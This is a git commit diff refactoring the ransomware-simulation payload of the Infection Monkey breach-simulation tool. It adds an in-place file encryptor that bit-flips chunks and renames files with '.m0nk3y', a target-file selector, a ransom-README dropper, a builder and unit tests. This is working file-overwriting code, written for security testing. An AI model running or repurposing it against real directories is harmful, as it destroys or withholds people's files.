forked from p15670423/monkey
Merge pull request #1325 from guardicore/ransomware-payload-refactor
Ransomware payload refactor
This commit is contained in:
commit
ed2ebc79c3
|
@ -1,7 +1,6 @@
|
||||||
import argparse
|
import argparse
|
||||||
import logging
|
import logging
|
||||||
import os
|
import os
|
||||||
import shutil
|
|
||||||
import subprocess
|
import subprocess
|
||||||
import sys
|
import sys
|
||||||
import time
|
import time
|
||||||
|
@ -20,18 +19,12 @@ from infection_monkey.network.HostFinger import HostFinger
|
||||||
from infection_monkey.network.network_scanner import NetworkScanner
|
from infection_monkey.network.network_scanner import NetworkScanner
|
||||||
from infection_monkey.network.tools import get_interface_to_target, is_running_on_island
|
from infection_monkey.network.tools import get_interface_to_target, is_running_on_island
|
||||||
from infection_monkey.post_breach.post_breach_handler import PostBreach
|
from infection_monkey.post_breach.post_breach_handler import PostBreach
|
||||||
from infection_monkey.ransomware.ransomware_payload import RansomwarePayload
|
from infection_monkey.ransomware.ransomware_payload_builder import build_ransomware_payload
|
||||||
from infection_monkey.system_info import SystemInfoCollector
|
from infection_monkey.system_info import SystemInfoCollector
|
||||||
from infection_monkey.system_singleton import SystemSingleton
|
from infection_monkey.system_singleton import SystemSingleton
|
||||||
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
|
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
|
||||||
from infection_monkey.telemetry.attack.t1107_telem import T1107Telem
|
from infection_monkey.telemetry.attack.t1107_telem import T1107Telem
|
||||||
from infection_monkey.telemetry.attack.victim_host_telem import VictimHostTelem
|
from infection_monkey.telemetry.attack.victim_host_telem import VictimHostTelem
|
||||||
from infection_monkey.telemetry.messengers.batching_telemetry_messenger import (
|
|
||||||
BatchingTelemetryMessenger,
|
|
||||||
)
|
|
||||||
from infection_monkey.telemetry.messengers.legacy_telemetry_messenger_adapter import (
|
|
||||||
LegacyTelemetryMessengerAdapter,
|
|
||||||
)
|
|
||||||
from infection_monkey.telemetry.scan_telem import ScanTelem
|
from infection_monkey.telemetry.scan_telem import ScanTelem
|
||||||
from infection_monkey.telemetry.state_telem import StateTelem
|
from infection_monkey.telemetry.state_telem import StateTelem
|
||||||
from infection_monkey.telemetry.system_info_telem import SystemInfoTelem
|
from infection_monkey.telemetry.system_info_telem import SystemInfoTelem
|
||||||
|
@ -473,12 +466,8 @@ class InfectionMonkey(object):
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def run_ransomware():
|
def run_ransomware():
|
||||||
telemetry_messenger = LegacyTelemetryMessengerAdapter()
|
|
||||||
batching_telemetry_messenger = BatchingTelemetryMessenger(telemetry_messenger)
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
RansomwarePayload(
|
ransomware_payload = build_ransomware_payload(WormConfiguration.ransomware)
|
||||||
WormConfiguration.ransomware, batching_telemetry_messenger, shutil.copyfile
|
ransomware_payload.run_payload()
|
||||||
).run_payload()
|
|
||||||
except Exception as ex:
|
except Exception as ex:
|
||||||
LOG.error(f"An unexpected error occurred while running the ransomware payload: {ex}")
|
LOG.error(f"An unexpected error occurred while running the ransomware payload: {ex}")
|
||||||
|
|
|
@ -1,21 +0,0 @@
|
||||||
from pathlib import Path
|
|
||||||
|
|
||||||
from infection_monkey.utils import bit_manipulators
|
|
||||||
|
|
||||||
|
|
||||||
class BitflipEncryptor:
|
|
||||||
def __init__(self, chunk_size=64):
|
|
||||||
self._chunk_size = chunk_size
|
|
||||||
|
|
||||||
def encrypt_file_in_place(self, filepath: Path):
|
|
||||||
with open(filepath, "rb+") as f:
|
|
||||||
data = f.read(self._chunk_size)
|
|
||||||
while data:
|
|
||||||
num_bytes_read = len(data)
|
|
||||||
|
|
||||||
encrypted_data = bit_manipulators.flip_bits(data)
|
|
||||||
|
|
||||||
f.seek(-num_bytes_read, 1)
|
|
||||||
f.write(encrypted_data)
|
|
||||||
|
|
||||||
data = f.read(self._chunk_size)
|
|
|
@ -10,12 +10,16 @@ from infection_monkey.utils.dir_utils import (
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
def select_production_safe_target_files(target_dir: Path, extensions: Set) -> List[Path]:
|
class ProductionSafeTargetFileSelector:
|
||||||
file_filters = [
|
def __init__(self, targeted_file_extensions: Set[str]):
|
||||||
file_extension_filter(extensions),
|
self._targeted_file_extensions = targeted_file_extensions
|
||||||
is_not_shortcut_filter,
|
|
||||||
is_not_symlink_filter,
|
|
||||||
]
|
|
||||||
|
|
||||||
all_files = get_all_regular_files_in_directory(target_dir)
|
def __call__(self, target_dir: Path) -> List[Path]:
|
||||||
return filter_files(all_files, file_filters)
|
file_filters = [
|
||||||
|
file_extension_filter(self._targeted_file_extensions),
|
||||||
|
is_not_shortcut_filter,
|
||||||
|
is_not_symlink_filter,
|
||||||
|
]
|
||||||
|
|
||||||
|
all_files = get_all_regular_files_in_directory(target_dir)
|
||||||
|
return filter_files(all_files, file_filters)
|
||||||
|
|
|
@ -0,0 +1,44 @@
|
||||||
|
import re
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Callable
|
||||||
|
|
||||||
|
FILE_EXTENSION_REGEX = re.compile(r"^\.[^\\/]+$")
|
||||||
|
|
||||||
|
|
||||||
|
class InPlaceFileEncryptor:
|
||||||
|
def __init__(
|
||||||
|
self,
|
||||||
|
encrypt_bytes: Callable[[bytes], bytes],
|
||||||
|
new_file_extension: str = "",
|
||||||
|
chunk_size: int = 64,
|
||||||
|
):
|
||||||
|
self._encrypt_bytes = encrypt_bytes
|
||||||
|
self._chunk_size = chunk_size
|
||||||
|
|
||||||
|
if new_file_extension and not FILE_EXTENSION_REGEX.match(new_file_extension):
|
||||||
|
raise ValueError(f'"{new_file_extension}" is not a valid file extension.')
|
||||||
|
|
||||||
|
self._new_file_extension = new_file_extension
|
||||||
|
|
||||||
|
def __call__(self, filepath: Path):
|
||||||
|
self._encrypt_file(filepath)
|
||||||
|
|
||||||
|
if self._new_file_extension:
|
||||||
|
self._add_extension(filepath)
|
||||||
|
|
||||||
|
def _encrypt_file(self, filepath: Path):
|
||||||
|
with open(filepath, "rb+") as f:
|
||||||
|
data = f.read(self._chunk_size)
|
||||||
|
while data:
|
||||||
|
num_bytes_read = len(data)
|
||||||
|
|
||||||
|
encrypted_data = self._encrypt_bytes(data)
|
||||||
|
|
||||||
|
f.seek(-num_bytes_read, 1)
|
||||||
|
f.write(encrypted_data)
|
||||||
|
|
||||||
|
data = f.read(self._chunk_size)
|
||||||
|
|
||||||
|
def _add_extension(self, filepath: Path):
|
||||||
|
new_filepath = filepath.with_suffix(f"{filepath.suffix}{self._new_file_extension}")
|
||||||
|
filepath.rename(new_filepath)
|
|
@ -0,0 +1,27 @@
|
||||||
|
import logging
|
||||||
|
|
||||||
|
from common.utils.file_utils import InvalidPath, expand_path
|
||||||
|
from infection_monkey.utils.environment import is_windows_os
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class RansomwareConfig:
|
||||||
|
def __init__(self, config: dict):
|
||||||
|
self.encryption_enabled = config["encryption"]["enabled"]
|
||||||
|
self.readme_enabled = config["other_behaviors"]["readme"]
|
||||||
|
|
||||||
|
self.target_directory = None
|
||||||
|
self._set_target_directory(config["encryption"]["directories"])
|
||||||
|
|
||||||
|
def _set_target_directory(self, os_target_directories: dict):
|
||||||
|
if is_windows_os():
|
||||||
|
target_directory = os_target_directories["windows_target_dir"]
|
||||||
|
else:
|
||||||
|
target_directory = os_target_directories["linux_target_dir"]
|
||||||
|
|
||||||
|
try:
|
||||||
|
self.target_directory = expand_path(target_directory)
|
||||||
|
except InvalidPath as e:
|
||||||
|
LOG.debug(f"Target ransomware directory set to None: {e}")
|
||||||
|
self.target_directory = None
|
|
@ -1,21 +1,13 @@
|
||||||
import logging
|
import logging
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from pprint import pformat
|
from typing import Callable, List
|
||||||
from typing import Callable, List, Optional, Tuple
|
|
||||||
|
|
||||||
from common.utils.file_utils import InvalidPath, expand_path
|
from infection_monkey.ransomware.ransomware_config import RansomwareConfig
|
||||||
from infection_monkey.ransomware.bitflip_encryptor import BitflipEncryptor
|
|
||||||
from infection_monkey.ransomware.file_selectors import select_production_safe_target_files
|
|
||||||
from infection_monkey.ransomware.targeted_file_extensions import TARGETED_FILE_EXTENSIONS
|
|
||||||
from infection_monkey.telemetry.file_encryption_telem import FileEncryptionTelem
|
from infection_monkey.telemetry.file_encryption_telem import FileEncryptionTelem
|
||||||
from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
|
from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
|
||||||
from infection_monkey.utils.environment import is_windows_os
|
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
EXTENSION = ".m0nk3y"
|
|
||||||
CHUNK_SIZE = 4096 * 24
|
|
||||||
|
|
||||||
README_SRC = Path(__file__).parent / "ransomware_readme.txt"
|
README_SRC = Path(__file__).parent / "ransomware_readme.txt"
|
||||||
README_DEST = "README.txt"
|
README_DEST = "README.txt"
|
||||||
|
|
||||||
|
@ -23,95 +15,48 @@ README_DEST = "README.txt"
|
||||||
class RansomwarePayload:
|
class RansomwarePayload:
|
||||||
def __init__(
|
def __init__(
|
||||||
self,
|
self,
|
||||||
config: dict,
|
config: RansomwareConfig,
|
||||||
|
encrypt_file: Callable[[Path], None],
|
||||||
|
select_files: Callable[[Path], List[Path]],
|
||||||
|
leave_readme: Callable[[Path, Path], None],
|
||||||
telemetry_messenger: ITelemetryMessenger,
|
telemetry_messenger: ITelemetryMessenger,
|
||||||
copy_file: Callable[[Path, Path], None],
|
|
||||||
):
|
):
|
||||||
LOG.debug(f"Ransomware payload configuration:\n{pformat(config)}")
|
self._config = config
|
||||||
|
|
||||||
self._encryption_enabled = config["encryption"]["enabled"]
|
self._encrypt_file = encrypt_file
|
||||||
self._readme_enabled = config["other_behaviors"]["readme"]
|
self._select_files = select_files
|
||||||
|
self._leave_readme = leave_readme
|
||||||
self._target_dir = RansomwarePayload.get_target_dir(config)
|
|
||||||
self._new_file_extension = EXTENSION
|
|
||||||
self._targeted_file_extensions = TARGETED_FILE_EXTENSIONS.copy()
|
|
||||||
self._targeted_file_extensions.discard(self._new_file_extension)
|
|
||||||
|
|
||||||
self._encryptor = BitflipEncryptor(chunk_size=CHUNK_SIZE)
|
|
||||||
self._copy_file = copy_file
|
|
||||||
self._telemetry_messenger = telemetry_messenger
|
self._telemetry_messenger = telemetry_messenger
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def get_target_dir(config: dict):
|
|
||||||
target_directories = config["encryption"]["directories"]
|
|
||||||
if is_windows_os():
|
|
||||||
target_dir_field = target_directories["windows_target_dir"]
|
|
||||||
else:
|
|
||||||
target_dir_field = target_directories["linux_target_dir"]
|
|
||||||
|
|
||||||
try:
|
|
||||||
return expand_path(target_dir_field)
|
|
||||||
except InvalidPath as e:
|
|
||||||
LOG.debug(f"Target ransomware dir set to None: {e}")
|
|
||||||
return None
|
|
||||||
|
|
||||||
def run_payload(self):
|
def run_payload(self):
|
||||||
if not self._target_dir:
|
if not self._config.target_directory:
|
||||||
return
|
return
|
||||||
|
|
||||||
LOG.info("Running ransomware payload")
|
LOG.info("Running ransomware payload")
|
||||||
|
|
||||||
if self._encryption_enabled:
|
if self._config.encryption_enabled:
|
||||||
file_list = self._find_files()
|
file_list = self._find_files()
|
||||||
self._encrypt_files(file_list)
|
self._encrypt_files(file_list)
|
||||||
|
|
||||||
if self._readme_enabled:
|
if self._config.readme_enabled:
|
||||||
self._leave_readme()
|
self._leave_readme(README_SRC, self._config.target_directory / README_DEST)
|
||||||
|
|
||||||
def _find_files(self) -> List[Path]:
|
def _find_files(self) -> List[Path]:
|
||||||
LOG.info(f"Collecting files in {self._target_dir}")
|
LOG.info(f"Collecting files in {self._config.target_directory}")
|
||||||
return sorted(
|
return sorted(self._select_files(self._config.target_directory))
|
||||||
select_production_safe_target_files(self._target_dir, self._targeted_file_extensions)
|
|
||||||
)
|
|
||||||
|
|
||||||
def _encrypt_files(self, file_list: List[Path]) -> List[Tuple[Path, Optional[Exception]]]:
|
def _encrypt_files(self, file_list: List[Path]):
|
||||||
LOG.info(f"Encrypting files in {self._target_dir}")
|
LOG.info(f"Encrypting files in {self._config.target_directory}")
|
||||||
|
|
||||||
results = []
|
|
||||||
for filepath in file_list:
|
for filepath in file_list:
|
||||||
try:
|
try:
|
||||||
LOG.debug(f"Encrypting {filepath}")
|
LOG.debug(f"Encrypting {filepath}")
|
||||||
self._encryptor.encrypt_file_in_place(filepath)
|
self._encrypt_file(filepath)
|
||||||
self._add_extension(filepath)
|
|
||||||
self._send_telemetry(filepath, True, "")
|
self._send_telemetry(filepath, True, "")
|
||||||
except Exception as ex:
|
except Exception as ex:
|
||||||
LOG.warning(f"Error encrypting {filepath}: {ex}")
|
LOG.warning(f"Error encrypting {filepath}: {ex}")
|
||||||
self._send_telemetry(filepath, False, str(ex))
|
self._send_telemetry(filepath, False, str(ex))
|
||||||
|
|
||||||
return results
|
|
||||||
|
|
||||||
def _add_extension(self, filepath: Path):
|
|
||||||
new_filepath = filepath.with_suffix(f"{filepath.suffix}{self._new_file_extension}")
|
|
||||||
filepath.rename(new_filepath)
|
|
||||||
|
|
||||||
def _send_telemetry(self, filepath: Path, success: bool, error: str):
|
def _send_telemetry(self, filepath: Path, success: bool, error: str):
|
||||||
encryption_attempt = FileEncryptionTelem(str(filepath), success, error)
|
encryption_attempt = FileEncryptionTelem(str(filepath), success, error)
|
||||||
self._telemetry_messenger.send_telemetry(encryption_attempt)
|
self._telemetry_messenger.send_telemetry(encryption_attempt)
|
||||||
|
|
||||||
def _leave_readme(self):
|
|
||||||
|
|
||||||
readme_dest_path = self._target_dir / README_DEST
|
|
||||||
|
|
||||||
if readme_dest_path.exists():
|
|
||||||
LOG.warning(f"{readme_dest_path} already exists, not leaving a new README.txt")
|
|
||||||
return
|
|
||||||
|
|
||||||
self._copy_readme_file(readme_dest_path)
|
|
||||||
|
|
||||||
def _copy_readme_file(self, dest: Path):
|
|
||||||
LOG.info(f"Leaving a ransomware README file at {dest}")
|
|
||||||
|
|
||||||
try:
|
|
||||||
self._copy_file(README_SRC, dest)
|
|
||||||
except Exception as ex:
|
|
||||||
LOG.warning(f"An error occurred while attempting to leave a README.txt file: {ex}")
|
|
||||||
|
|
|
@ -0,0 +1,62 @@
|
||||||
|
import logging
|
||||||
|
from pprint import pformat
|
||||||
|
|
||||||
|
from infection_monkey.ransomware import readme_dropper
|
||||||
|
from infection_monkey.ransomware.file_selectors import ProductionSafeTargetFileSelector
|
||||||
|
from infection_monkey.ransomware.in_place_file_encryptor import InPlaceFileEncryptor
|
||||||
|
from infection_monkey.ransomware.ransomware_config import RansomwareConfig
|
||||||
|
from infection_monkey.ransomware.ransomware_payload import RansomwarePayload
|
||||||
|
from infection_monkey.ransomware.targeted_file_extensions import TARGETED_FILE_EXTENSIONS
|
||||||
|
from infection_monkey.telemetry.messengers.batching_telemetry_messenger import (
|
||||||
|
BatchingTelemetryMessenger,
|
||||||
|
)
|
||||||
|
from infection_monkey.telemetry.messengers.legacy_telemetry_messenger_adapter import (
|
||||||
|
LegacyTelemetryMessengerAdapter,
|
||||||
|
)
|
||||||
|
from infection_monkey.utils.bit_manipulators import flip_bits
|
||||||
|
|
||||||
|
EXTENSION = ".m0nk3y"
|
||||||
|
CHUNK_SIZE = 4096 * 24
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
def build_ransomware_payload(config: dict):
|
||||||
|
LOG.debug(f"Ransomware payload configuration:\n{pformat(config)}")
|
||||||
|
ransomware_config = RansomwareConfig(config)
|
||||||
|
|
||||||
|
file_encryptor = _build_file_encryptor()
|
||||||
|
file_selector = _build_file_selector()
|
||||||
|
leave_readme = _build_leave_readme()
|
||||||
|
telemetry_messenger = _build_telemetry_messenger()
|
||||||
|
|
||||||
|
return RansomwarePayload(
|
||||||
|
ransomware_config,
|
||||||
|
file_encryptor,
|
||||||
|
file_selector,
|
||||||
|
leave_readme,
|
||||||
|
telemetry_messenger,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _build_file_encryptor():
|
||||||
|
return InPlaceFileEncryptor(
|
||||||
|
encrypt_bytes=flip_bits, new_file_extension=EXTENSION, chunk_size=CHUNK_SIZE
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _build_file_selector():
|
||||||
|
targeted_file_extensions = TARGETED_FILE_EXTENSIONS.copy()
|
||||||
|
targeted_file_extensions.discard(EXTENSION)
|
||||||
|
|
||||||
|
return ProductionSafeTargetFileSelector(targeted_file_extensions)
|
||||||
|
|
||||||
|
|
||||||
|
def _build_leave_readme():
|
||||||
|
return readme_dropper.leave_readme
|
||||||
|
|
||||||
|
|
||||||
|
def _build_telemetry_messenger():
|
||||||
|
telemetry_messenger = LegacyTelemetryMessengerAdapter()
|
||||||
|
|
||||||
|
return BatchingTelemetryMessenger(telemetry_messenger)
|
|
@ -0,0 +1,22 @@
|
||||||
|
import logging
|
||||||
|
import shutil
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
def leave_readme(src: Path, dest: Path):
|
||||||
|
if dest.exists():
|
||||||
|
LOG.warning(f"{dest} already exists, not leaving a new README.txt")
|
||||||
|
return
|
||||||
|
|
||||||
|
_copy_readme_file(src, dest)
|
||||||
|
|
||||||
|
|
||||||
|
def _copy_readme_file(src: Path, dest: Path):
|
||||||
|
LOG.info(f"Leaving a ransomware README file at {dest}")
|
||||||
|
|
||||||
|
try:
|
||||||
|
shutil.copyfile(src, dest)
|
||||||
|
except Exception as ex:
|
||||||
|
LOG.warning(f"An error occurred while attempting to leave a README.txt file: {ex}")
|
|
@ -10,4 +10,4 @@ sys.path.insert(0, MONKEY_BASE_PATH)
|
||||||
|
|
||||||
@pytest.fixture(scope="session")
|
@pytest.fixture(scope="session")
|
||||||
def data_for_tests_dir(pytestconfig):
|
def data_for_tests_dir(pytestconfig):
|
||||||
return os.path.join(pytestconfig.rootdir, "monkey", "tests", "data_for_tests")
|
return Path(os.path.join(pytestconfig.rootdir, "monkey", "tests", "data_for_tests"))
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Hello, World!
|
|
@ -12,8 +12,12 @@ def patched_home_env(monkeypatch, tmp_path):
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture
|
@pytest.fixture
|
||||||
def ransomware_target(tmp_path, data_for_tests_dir):
|
def ransomware_test_data(data_for_tests_dir):
|
||||||
ransomware_test_data = Path(data_for_tests_dir) / "ransomware_targets"
|
return Path(data_for_tests_dir) / "ransomware_targets"
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture
|
||||||
|
def ransomware_target(tmp_path, ransomware_test_data):
|
||||||
ransomware_target = tmp_path / "ransomware_target"
|
ransomware_target = tmp_path / "ransomware_target"
|
||||||
shutil.copytree(ransomware_test_data, ransomware_target)
|
shutil.copytree(ransomware_test_data, ransomware_target)
|
||||||
|
|
||||||
|
|
|
@ -1,21 +1,14 @@
|
||||||
SUBDIR = "subdir"
|
SUBDIR = "subdir"
|
||||||
ALL_ZEROS_PDF = "all_zeros.pdf"
|
ALL_ZEROS_PDF = "all_zeros.pdf"
|
||||||
ALREADY_ENCRYPTED_TXT_M0NK3Y = "already_encrypted.txt.m0nk3y"
|
|
||||||
HELLO_TXT = "hello.txt"
|
HELLO_TXT = "hello.txt"
|
||||||
SHORTCUT_LNK = "shortcut.lnk"
|
SHORTCUT_LNK = "shortcut.lnk"
|
||||||
TEST_KEYBOARD_TXT = "test_keyboard.txt"
|
TEST_KEYBOARD_TXT = "test_keyboard.txt"
|
||||||
TEST_LIB_DLL = "test_lib.dll"
|
TEST_LIB_DLL = "test_lib.dll"
|
||||||
|
|
||||||
ALL_ZEROS_PDF_CLEARTEXT_SHA256 = "ab3df617aaa3140f04dc53f65b5446f34a6b2bdbb1f7b78db8db4d067ba14db9"
|
ALL_ZEROS_PDF_CLEARTEXT_SHA256 = "ab3df617aaa3140f04dc53f65b5446f34a6b2bdbb1f7b78db8db4d067ba14db9"
|
||||||
ALREADY_ENCRYPTED_TXT_M0NK3Y_CLEARTEXT_SHA256 = (
|
|
||||||
"ff5e58498962ab8bd619d3a9cd24b9298e7efc25b4967b1ce3f03b0e6de2aa7a"
|
|
||||||
)
|
|
||||||
HELLO_TXT_CLEARTEXT_SHA256 = "0ba904eae8773b70c75333db4de2f3ac45a8ad4ddba1b242f0b3cfc199391dd8"
|
|
||||||
SHORTCUT_LNK_CLEARTEXT_SHA256 = "5069c8b7c3c70fad55bf0f0790de787080b1b4397c4749affcd3e570ff53aad9"
|
|
||||||
TEST_KEYBOARD_TXT_CLEARTEXT_SHA256 = (
|
TEST_KEYBOARD_TXT_CLEARTEXT_SHA256 = (
|
||||||
"9d1a38784b7eefef6384bfc4b89048017db840adace11504a947016072750b2b"
|
"9d1a38784b7eefef6384bfc4b89048017db840adace11504a947016072750b2b"
|
||||||
)
|
)
|
||||||
TEST_LIB_DLL_CLEARTEXT_SHA256 = "0922d3132f2378edf313b8c2b6609a2548879911686994ca45fc5c895a7e91b1"
|
|
||||||
|
|
||||||
ALL_ZEROS_PDF_ENCRYPTED_SHA256 = "779c176e820dbdaf643419232cb4d2760360c8633d6fe209cf706707db799b4d"
|
ALL_ZEROS_PDF_ENCRYPTED_SHA256 = "779c176e820dbdaf643419232cb4d2760360c8633d6fe209cf706707db799b4d"
|
||||||
TEST_KEYBOARD_TXT_ENCRYPTED_SHA256 = (
|
TEST_KEYBOARD_TXT_ENCRYPTED_SHA256 = (
|
||||||
|
|
|
@ -1,34 +0,0 @@
|
||||||
import os
|
|
||||||
|
|
||||||
from tests.unit_tests.infection_monkey.ransomware.ransomware_target_files import (
|
|
||||||
TEST_KEYBOARD_TXT,
|
|
||||||
TEST_KEYBOARD_TXT_CLEARTEXT_SHA256,
|
|
||||||
TEST_KEYBOARD_TXT_ENCRYPTED_SHA256,
|
|
||||||
)
|
|
||||||
from tests.utils import hash_file
|
|
||||||
|
|
||||||
from infection_monkey.ransomware.bitflip_encryptor import BitflipEncryptor
|
|
||||||
|
|
||||||
|
|
||||||
def test_file_encrypted(ransomware_target):
|
|
||||||
test_keyboard = ransomware_target / TEST_KEYBOARD_TXT
|
|
||||||
|
|
||||||
assert hash_file(test_keyboard) == TEST_KEYBOARD_TXT_CLEARTEXT_SHA256
|
|
||||||
|
|
||||||
encryptor = BitflipEncryptor(chunk_size=64)
|
|
||||||
encryptor.encrypt_file_in_place(test_keyboard)
|
|
||||||
|
|
||||||
assert hash_file(test_keyboard) == TEST_KEYBOARD_TXT_ENCRYPTED_SHA256
|
|
||||||
|
|
||||||
|
|
||||||
def test_file_encrypted_in_place(ransomware_target):
|
|
||||||
test_keyboard = ransomware_target / TEST_KEYBOARD_TXT
|
|
||||||
|
|
||||||
expected_inode = os.stat(test_keyboard).st_ino
|
|
||||||
|
|
||||||
encryptor = BitflipEncryptor(chunk_size=64)
|
|
||||||
encryptor.encrypt_file_in_place(test_keyboard)
|
|
||||||
|
|
||||||
actual_inode = os.stat(test_keyboard).st_ino
|
|
||||||
|
|
||||||
assert expected_inode == actual_inode
|
|
|
@ -0,0 +1,55 @@
|
||||||
|
import os
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
from tests.unit_tests.infection_monkey.ransomware.ransomware_target_files import (
|
||||||
|
ALL_ZEROS_PDF,
|
||||||
|
HELLO_TXT,
|
||||||
|
SHORTCUT_LNK,
|
||||||
|
SUBDIR,
|
||||||
|
TEST_KEYBOARD_TXT,
|
||||||
|
TEST_LIB_DLL,
|
||||||
|
)
|
||||||
|
from tests.utils import is_user_admin
|
||||||
|
|
||||||
|
from infection_monkey.ransomware.file_selectors import ProductionSafeTargetFileSelector
|
||||||
|
|
||||||
|
TARGETED_FILE_EXTENSIONS = [".pdf", ".txt"]
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture
|
||||||
|
def file_selector():
|
||||||
|
return ProductionSafeTargetFileSelector(TARGETED_FILE_EXTENSIONS)
|
||||||
|
|
||||||
|
|
||||||
|
def test_select_targeted_files_only(ransomware_test_data, file_selector):
|
||||||
|
selected_files = file_selector(ransomware_test_data)
|
||||||
|
|
||||||
|
assert len(selected_files) == 2
|
||||||
|
assert (ransomware_test_data / ALL_ZEROS_PDF) in selected_files
|
||||||
|
assert (ransomware_test_data / TEST_KEYBOARD_TXT) in selected_files
|
||||||
|
|
||||||
|
|
||||||
|
def test_shortcut_not_selected(ransomware_test_data):
|
||||||
|
extensions = TARGETED_FILE_EXTENSIONS + [".lnk"]
|
||||||
|
file_selector = ProductionSafeTargetFileSelector(extensions)
|
||||||
|
|
||||||
|
selected_files = file_selector(ransomware_test_data)
|
||||||
|
assert ransomware_test_data / SHORTCUT_LNK not in selected_files
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.skipif(
|
||||||
|
os.name == "nt" and not is_user_admin(), reason="Test requires admin rights on Windows"
|
||||||
|
)
|
||||||
|
def test_symlink_not_selected(ransomware_target, file_selector):
|
||||||
|
SYMLINK = "symlink.pdf"
|
||||||
|
link_path = ransomware_target / SYMLINK
|
||||||
|
link_path.symlink_to(ransomware_target / TEST_LIB_DLL)
|
||||||
|
|
||||||
|
selected_files = file_selector(ransomware_target)
|
||||||
|
assert link_path not in selected_files
|
||||||
|
|
||||||
|
|
||||||
|
def test_directories_not_selected(ransomware_test_data, file_selector):
|
||||||
|
selected_files = file_selector(ransomware_test_data)
|
||||||
|
|
||||||
|
assert (ransomware_test_data / SUBDIR / HELLO_TXT) not in selected_files
|
|
@ -0,0 +1,73 @@
|
||||||
|
import os
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
from tests.unit_tests.infection_monkey.ransomware.ransomware_target_files import (
|
||||||
|
ALL_ZEROS_PDF,
|
||||||
|
ALL_ZEROS_PDF_CLEARTEXT_SHA256,
|
||||||
|
ALL_ZEROS_PDF_ENCRYPTED_SHA256,
|
||||||
|
TEST_KEYBOARD_TXT,
|
||||||
|
TEST_KEYBOARD_TXT_CLEARTEXT_SHA256,
|
||||||
|
TEST_KEYBOARD_TXT_ENCRYPTED_SHA256,
|
||||||
|
)
|
||||||
|
from tests.utils import hash_file
|
||||||
|
|
||||||
|
from infection_monkey.ransomware.in_place_file_encryptor import InPlaceFileEncryptor
|
||||||
|
from infection_monkey.utils.bit_manipulators import flip_bits
|
||||||
|
|
||||||
|
EXTENSION = ".m0nk3y"
|
||||||
|
|
||||||
|
|
||||||
|
def with_extension(filename):
|
||||||
|
return f"{filename}{EXTENSION}"
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture(scope="module")
|
||||||
|
def in_place_bitflip_file_encryptor():
|
||||||
|
return InPlaceFileEncryptor(encrypt_bytes=flip_bits, chunk_size=64)
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("invalid_extension", ["no_dot", ".has/slash", ".has\\slash"])
|
||||||
|
def test_invalid_file_extension(invalid_extension):
|
||||||
|
with pytest.raises(ValueError):
|
||||||
|
InPlaceFileEncryptor(encrypt_bytes=None, new_file_extension=invalid_extension)
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize(
|
||||||
|
"file_name,cleartext_hash,encrypted_hash",
|
||||||
|
[
|
||||||
|
(TEST_KEYBOARD_TXT, TEST_KEYBOARD_TXT_CLEARTEXT_SHA256, TEST_KEYBOARD_TXT_ENCRYPTED_SHA256),
|
||||||
|
(ALL_ZEROS_PDF, ALL_ZEROS_PDF_CLEARTEXT_SHA256, ALL_ZEROS_PDF_ENCRYPTED_SHA256),
|
||||||
|
],
|
||||||
|
)
|
||||||
|
def test_file_encrypted(
|
||||||
|
in_place_bitflip_file_encryptor, ransomware_target, file_name, cleartext_hash, encrypted_hash
|
||||||
|
):
|
||||||
|
test_keyboard = ransomware_target / file_name
|
||||||
|
|
||||||
|
assert hash_file(test_keyboard) == cleartext_hash
|
||||||
|
|
||||||
|
in_place_bitflip_file_encryptor(test_keyboard)
|
||||||
|
|
||||||
|
assert hash_file(test_keyboard) == encrypted_hash
|
||||||
|
|
||||||
|
|
||||||
|
def test_file_encrypted_in_place(in_place_bitflip_file_encryptor, ransomware_target):
|
||||||
|
test_keyboard = ransomware_target / TEST_KEYBOARD_TXT
|
||||||
|
|
||||||
|
expected_inode = os.stat(test_keyboard).st_ino
|
||||||
|
in_place_bitflip_file_encryptor(test_keyboard)
|
||||||
|
actual_inode = os.stat(test_keyboard).st_ino
|
||||||
|
|
||||||
|
assert expected_inode == actual_inode
|
||||||
|
|
||||||
|
|
||||||
|
def test_encrypted_file_has_new_extension(ransomware_target):
|
||||||
|
test_keyboard = ransomware_target / TEST_KEYBOARD_TXT
|
||||||
|
encrypted_test_keyboard = ransomware_target / with_extension(TEST_KEYBOARD_TXT)
|
||||||
|
encryptor = InPlaceFileEncryptor(encrypt_bytes=flip_bits, new_file_extension=EXTENSION)
|
||||||
|
|
||||||
|
encryptor(test_keyboard)
|
||||||
|
|
||||||
|
assert not test_keyboard.exists()
|
||||||
|
assert encrypted_test_keyboard.exists()
|
||||||
|
assert hash_file(encrypted_test_keyboard) == TEST_KEYBOARD_TXT_ENCRYPTED_SHA256
|
|
@ -0,0 +1,73 @@
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
from tests.utils import raise_
|
||||||
|
|
||||||
|
from common.utils.file_utils import InvalidPath
